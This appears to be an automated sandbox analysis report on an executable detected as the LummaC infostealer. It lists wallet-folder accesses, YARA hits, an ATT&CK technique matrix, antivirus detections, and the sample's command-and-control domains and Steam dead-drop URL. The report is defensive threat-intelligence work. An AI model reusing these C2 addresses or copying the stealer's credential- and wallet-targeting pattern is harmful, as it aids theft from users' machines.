                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tPSrcPbmRe.exe PID: 6480, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: tPSrcPbmRe.exe PID: 6480, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		34
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory751
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager34
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                tPSrcPbmRe.exe68%ReversingLabsWin32.Trojan.Generic
                tPSrcPbmRe.exe69%VirustotalBrowse
                tPSrcPbmRe.exe100%AviraTR/Crypt.XPACK.Gen
                tPSrcPbmRe.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		23.55.153.106
                		truefalse
                  		high
                  lev-tolstoi.com
                  		104.21.66.86
                  		truefalse
                    		high
                    sustainskelet.lat
                    		unknown
                    		unknownfalse
                      		high
                      crosshuaht.lat
                      		unknown
                      		unknownfalse
                        		high
                        rapeflowwj.lat
                        		unknown
                        		unknownfalse
                          		high
                          grannyejh.lat
                          		unknown
                          		unknownfalse
                            		high
                            aspecteirs.lat
                            		unknown
                            		unknownfalse
                              		high
                              sweepyribs.lat
                              		unknown
                              		unknownfalse
                                		high
                                discokeyus.lat
                                		unknown
                                		unknownfalse
                                  		high
                                  energyaffai.lat
                                  		unknown
                                  		unknownfalse
                                    		high
                                    necklacebudi.lat
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      aspecteirs.latfalse
                                        		high
                                        sweepyribs.latfalse
                                          		high
                                          sustainskelet.latfalse
                                            		high
                                            rapeflowwj.latfalse
                                              		high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                		high
                                                energyaffai.latfalse
                                                  		high
                                                  https://lev-tolstoi.com/apifalse
                                                    		high
                                                    grannyejh.latfalse
                                                      		high
                                                      necklacebudi.latfalse
                                                        		high
                                                        crosshuaht.latfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtabtPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://player.vimeo.comtPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://lev-tolstoi.com/piPtPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amptPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://steamcommunity.com/?subsection=broadcaststPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://lev-tolstoi.com/stPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://lev-tolstoi.com/piHtPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://lev-tolstoi.com/apiretPSrcPbmRe.exe, 00000000.00000003.2320110166.00000000012C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://store.steampowered.com/subscriber_agreement/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.gstatic.cn/recaptcha/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEEtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.valvesoftware.com/legal.htmtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=entPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.youtube.comtPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.google.comtPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://lev-tolstoi.com/api)tPSrcPbmRe.exe, 00000000.00000002.2377038945.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369474716.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001354000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://lev-tolstoi.com/api(tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbacktPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engltPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englistPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCtPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://s.ytimg.com;tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://lev-tolstoi.com/dtPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://steam.tv/tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=entPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://lev-tolstoi.com/2UtPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://lev-tolstoi.com/tPSrcPbmRe.exe, tPSrcPbmRe.exe, 00000000.00000003.2267311649.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245471516.000000000135C000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2268779813.0000000005AD6000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2220955202.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369256724.0000000005AD1000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320254445.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2378751257.0000000005AD6000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245414561.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2220817144.000000000133A000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://store.steampowered.com/privacy_agreement/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYitPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/points/shop/tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://ocsp.rootca1.amazontrust.com0:tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&atPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://sketchfab.comtPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.ecosia.org/newtab/tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://lv.queniujq.cntPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
